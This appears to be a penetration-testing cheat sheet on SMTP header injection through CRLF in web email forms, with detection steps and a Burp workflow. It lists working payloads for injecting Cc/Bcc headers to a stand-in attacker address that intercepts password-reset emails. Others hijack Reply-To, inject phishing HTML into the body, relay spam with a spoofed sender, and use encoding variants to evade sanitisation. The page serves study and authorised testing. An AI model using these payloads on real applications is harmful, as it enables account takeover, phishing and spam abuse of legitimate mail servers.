KagisoSec_
Web
WEB

SMTP Header Injection

SMTP header injection via CRLF in email form fields: injecting Cc/Bcc headers to intercept emails, spam relay, body injection, detection methodology, dummy header bypass, and Burp testing workflow.

web smtp-injection email crlf header-injection cwee

What is SMTP Header Injection

SMTP (email) headers are separated by \r\n (CRLF). When a web application passes unsanitised user input into an SMTP header (From, To, Subject, Reply-To), an attacker can inject additional headers — redirecting mail, adding recipients, or injecting content into the email body.

This differs from CRLF injection in HTTP responses — the target here is the mail server, not the HTTP response.

Detection

Step 1 — Find email-sending functionality

Look for:

  • Contact forms (name, email, message)
  • Password reset emails
  • Newsletter subscription forms
  • Account notification settings
  • Feedback / support ticket forms

Step 2 — Identify which fields appear in headers

The from email and subject fields are most commonly injected directly into SMTP headers. Test each field that might be used in the email’s From/Subject/Reply-To:

# Inject into email field
email=test@example.com%0d%0aCc:+attacker@evil.com

# Inject into subject field
subject=Test%0d%0aCc:+attacker@evil.com

# Inject into name field (if used in From header)
name=John%0d%0aCc:+attacker@evil.com

Step 3 — Confirm injection

Send the form. Check if attacker@evil.com receives the email (Cc injection worked) or observe an error response caused by the injected newlines.

In a black-box test, use a Collaborator subdomain as the injected Cc address — if it receives a DNS lookup → email was sent to that address.

SMTP Header Structure Reference

From: sender@example.com\r\n
To: recipient@example.com\r\n
Cc: copy@example.com\r\n
Bcc: hidden@example.com\r\n
Subject: Hello\r\n
Reply-To: reply@example.com\r\n
\r\n
Email body here.

Each header ends with \r\n. The blank line (\r\n\r\n) separates headers from the body.

Exploit 1: Cc / Bcc Header Injection

Intercept password reset emails or form confirmation emails sent to users:

email=victim@example.com%0d%0aCc:+attacker@evil.com

The application builds:

To: victim@example.com
Cc: attacker@evil.com
Subject: Password Reset

The attacker receives a copy of the password reset link.

Bcc (hidden copy):

email=victim@example.com%0d%0aBcc:+attacker@evil.com

Exploit 2: Multiple Header Injection

Inject multiple headers in sequence:

email=victim@example.com%0d%0aCc:+attacker@evil.com%0d%0aBcc:+attacker2@evil.com

Or add Reply-To to hijack responses:

email=victim@example.com%0d%0aReply-To:+attacker@evil.com

Any replies to the email go to the attacker.

Exploit 3: Subject Header Injection

Inject into the subject line to add additional headers:

subject=Hello%0d%0aCc:+attacker@evil.com

Builds:

Subject: Hello
Cc: attacker@evil.com

Exploit 4: Dummy Header Bypass

If the application appends more data after the user-controlled value, a trailing injected header might break the email. Add a dummy header to absorb the trailing content:

email=victim@example.com%0d%0aCc:+attacker@evil.com%0d%0aDummyHeader:+absorb

The application might build:

To: victim@example.com
Cc: attacker@evil.com
DummyHeader: absorb  ← absorbs any trailing app-appended data

Exploit 5: Body Injection (Add New Body Content)

Inject a double CRLF to start the body section early, then inject content before the real body:

email=victim@example.com%0d%0aContent-Type:+text/html%0d%0a%0d%0a<h1>Click+here+to+verify:</h1><a+href="https://attacker.com">Verify+Account</a>

Builds:

To: victim@example.com
Content-Type: text/html

<h1>Click here to verify:</h1><a href="https://attacker.com">Verify Account</a>
... original body appended after

Exploit 6: Spam Relay

If the application allows injecting To/From headers, use it as a spam relay:

email=victim@example.com%0d%0aTo:+target1@spam.com,target2@spam.com%0d%0aFrom:+spoofed@legitimate.com%0d%0aSubject:+Win+a+Prize%0d%0a%0d%0aClick+here:+http://phishing.com

The trusted mail server sends spam on behalf of the legitimate application domain.

CRLF Encoding Variants

Different mail libraries decode differently — try:

%0d%0a       standard URL-encoded \r\n
%0a          just \n (some MTAs accept)
%0d          just \r  
\r\n         literal (if not URL-decoded by proxy)
%250d%250a   double URL-encoded

Burp Suite workflow

  1. Proxy — intercept all form submissions that trigger email sending; identify fields used in From/Subject/Reply-To.
  2. Repeater — inject %0d%0aCc:+attacker@evil.com into email, name, and subject fields.
  3. Collaborator — use a Collaborator subdomain as the injected Cc address to confirm blind injection without owning an external mailbox.
  4. Intruder — fuzz CRLF encoding variants to bypass input sanitisation.
  5. Check the application’s response: a 500 error on the injected request (but 200 on clean) often indicates the SMTP command was malformed by your injection — adjust encoding.